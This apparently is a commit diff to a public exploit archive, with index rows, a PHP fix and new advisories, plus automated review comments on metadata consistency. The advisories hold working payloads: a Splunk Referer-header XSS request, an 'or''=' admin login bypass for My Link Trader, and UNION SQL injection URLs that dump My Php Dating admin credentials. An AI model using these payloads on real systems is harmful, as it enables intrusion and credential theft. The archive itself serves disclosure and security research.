40010,platforms/php/webapps/40010.html,"XuezhuLi FileSharing - Cross-Site Request Forgery (Add User)",2016-06-23,HaHwul,php,webapps,80
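
Review bot: Row 40111 (dated 2016-07-14) sits between 39998 and 40006 (2016-06-21 and 2016-06-23), out of both id and date order; since this hunk rewrites that row anyway, move it to its sorted position. The rename from 'com_guru' to "Guru Pro" also introduces an edition name the old title did not have, so check it against 40111.txt.
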
@ -36938,4 +36939,7 @@ id,file,description,date,author,platform,type,port
40982,platforms/hardware/webapps/40982.html,"Xfinity Gateway (Technicolor DPC3941T) - Cross-Site Request Forgery",2016-08-09,"Ayushman Dutta",hardware,webapps,0
40986,platforms/php/webapps/40986.py,"PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - (AIO) 'PwnScriptum' Remote Code Execution",2017-01-02,"Dawid Golunski",php,webapps,0
40989,platforms/jsp/webapps/40989.txt,"Atlassian Confluence < 5.10.6 - Persistent Cross-Site Scripting",2017-01-04,"Jodson Santos",jsp,webapps,0
40996,platforms/php/webapps/40996.txt,"DirectAdmin 1.50.1 - Denial of Service",2017-01-08,"IeDb ir",php,webapps,0
40997,platforms/php/webapps/40997.txt,"Splunk 6.1.1 - 'Referer' Header Cross-Site Scripting",2017-01-07,justpentest,php,webapps,0
40998,platforms/php/webapps/40998.txt,"My Link Trader 1.1 - Authentication Bypass",2017-01-07,"Ihsan Sencan",php,webapps,0
40999,platforms/php/webapps/40999.txt,"My Php Dating 2.0 - 'path' Parameter SQL Injection",2017-01-09,"Ihsan Sencan",php,webapps,0
41001,platforms/php/webapps/41001.txt,"My Php Dating 2.0 - 'id' Parameter SQL Injection",2017-01-09,"Sniper Pex",php,webapps,0
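
Review bot: The 41001 row credits "Sniper Pex", but the header of platforms/php/webapps/41001.txt added in this same commit reads "Author: Nassim Asrir"; the two need to agree. The 40998 row has the same kind of drift on the date (2017-01-07 in the row, "Date:09.01.2017" in 40998.txt), and the 40997 row records port 0 while the request in 40997.txt is sent to port 8000.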


@ -217,7 +217,7 @@ if ($s==1){
$count=0;
$res=nl2br(htmlentities($html));
$str =
array('2.0.11&lt;/title','2.0.12</title','2.0.13&lt;/title','2.0.14&lt;/title','2.0.15&lt;/title','1.5.7.10&lt;/title','1.5.7.11&lt;/title','1.5.7.12&lt;/title','1.5.7.13&lt;/title','1.5.7.14&lt;/title');
array('2.0.11</title','2.0.12</title','2.0.13</title','2.0.14</title','2.0.15</title','1.5.7.10</title','1.5.7.11</title','1.5.7.12</title','1.5.7.13</title','1.5.7.14</title');
foreach ($str as $value){
$pos = strpos($res, $value);
if ($pos === false) {
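
Review bot: The needles that contain a raw `<` ('2.0.12</title' in the first array(...) line, every entry in the second) can never be found by strpos($res, $value), because $res is built just above as nl2br(htmlentities($html)) and htmlentities() turns `<` into `&lt;`. Keep the `&lt;/title` spelling for all ten entries, including 2.0.12, or run the search against $html instead of $res.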


@ -4,4 +4,4 @@ The 'com_community' component for Joomla! is prone to an SQL-injection vulnerabi
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_community&amp;view=profile&amp;userid=156
http://www.example.com/index.php?option=com_community&view=profile&userid=156
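
Review bot: The URL on the changed line ends in userid=156 with nothing marking which parameter is injectable, and the description above it only says the component is prone to an SQL-injection vulnerability. Since the file is being touched anyway, name the affected parameter in the description so the entry can be turned into an input-validation or detection check without guessing.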

29
platforms/php/webapps/40997.txt Executable file

@ -0,0 +1,29 @@
# Exploit Title: Splunk 'Referer' Header Cross Site Scripting Vulnerability
# Date: 7th January 2017
# Exploit Author: justpentest
# Vendor Homepage: http://www.splunk.com/
# Version: Splunk 6.1.1 other versions may also be affected.
# Contact: transform2secure@gmail.com
Source: http://www.securityfocus.com/bid/67655/info
1) Description:
Splunk is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in an unsuspecting user's browser in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2) Exploit:
URL: http://justpentest.com:8000/en-US/app/
GET /en-US/app/ HTTP/1.1
Host=justpentest.com:8000
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=javascript:prompt("XXS by justpentest");
Connection=keep-alive
----------------------------------------------------------------------------------------
Response:
<p>This page was linked to from <a href="javascript:prompt("XXS by justpentest");">javascript:prompt("XXS by justpentest");</a>.</p>
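
Review bot: The request under "2) Exploit" writes its headers as Name=value (Host=justpentest.com:8000, Referer=...) instead of HTTP's "Name: value", and it targets the author's own domain rather than a placeholder host such as the www.example.com used elsewhere in this commit. Rewrite it as a well-formed request against a placeholder, fix "XXS" to "XSS", and replace "other versions may also be affected" with the fixed release if the vendor has named one, so the entry tells an operator what to upgrade to.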

13
platforms/php/webapps/40998.txt Executable file

@ -0,0 +1,13 @@
# # # # #
# Vulnerability:: Admin Login Bypass & SQLi
# Date:09.01.2017
# Vendor Homepage: http://software.friendsinwar.com/
# Script Name: My Link Trader
# Script Version: v1.1
# Script DL: http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=13
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# http://localhost/[PATH]/admin/login.php and set Username and Password to 'or''=' and hit enter.
# # # # #
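
Review bot: The header announces "Admin Login Bypass & SQLi", but the only finding documented is the login form at admin/login.php accepting 'or''=' in both fields; either describe the separate SQL injection or drop "& SQLi" from the title. The file also has no "Tested on" line, and its date (09.01.2017) differs from the 2017-01-07 recorded in the CSV index row for 40998.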

34
platforms/php/webapps/40999.txt Executable file

@ -0,0 +1,34 @@
# # # # #
# Vulnerability: My Php Dating 2.0 - SQL Injection Web Vulnerability
# Google Dork: My Php Dating
# Date:09.01.2017
# Vendor Homepage: http://www.phponlinedatingsoftware.com/demo.htm
# Tested on: http://www.phponlinedatingsoftware.com/demo/
# Script Name: My Php Dating
# Script Version: 2.0
# Script Buy Now: http://www.phponlinedatingsoftware.com/order.htm
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/view_image.php?path=[SQL]
# # # # #
--------------------------------------------------
Note:
Rate: 0/10 [Rate Picture] <<<Link
--------------------------------------------------
http://localhost/[PATH]/view_image.php?path=-124 union select 1,version(),3,4,5,6,7,8,9
Version: javascript:%20ajax_rate_pic(5.5.52-cll,1,1)
--------------------------------------------------
http://localhost/[PATH]/view_image.php?path=-124+union+select+1,group_concat(admin_id,admin_uname,admin_pass,admin_email),3,4,5,6,7,8,9+from+admin_master--
--------------------------------------------------
http://localhost/[PATH]/view_image.php?path=-124+union+select+1,group_concat(column_name),3,4,5,6,7,8,9+from+information_schema.columns+where+table_schema=database()--
--------------------------------------------------
http://localhost/[PATH]/view_image.php?path=-124+union+select+1,group_concat(table_name),3,4,5,6,7,8,9+from+information_schema.tables+where+table_schema=database()--
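
Review bot: "Tested on" names the vendor's hosted demo (http://www.phponlinedatingsoftware.com/demo/) while every request line uses http://localhost/[PATH]/, so it is unclear which installation produced the "5.5.52-cll" output; state the test environment once and consistently. The "Note:" block ("Rate: 0/10 [Rate Picture] <<<Link") also needs a sentence saying what it refers to, since as written it is not connected to the requests that follow.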

23
platforms/php/webapps/41001.txt Executable file

@ -0,0 +1,23 @@
# Vulnerability: My Php Dating 2.0 - SQL Injection
# Google Dork: use your mind
# Date: 09.01.2017
# Vendor Homepage: http://www.phponlinedatingsoftware.com/demo.htm
# Tested on: win7
# Author: Nassim Asrir
# Author Company: Henceforth
# Contact: wassline@gmail.com
#########################
# SQL Injection/Exploit :
# Vulnerable Parametre : id
# http://localhost/[PATH]/view_profile.php?id=[SQL]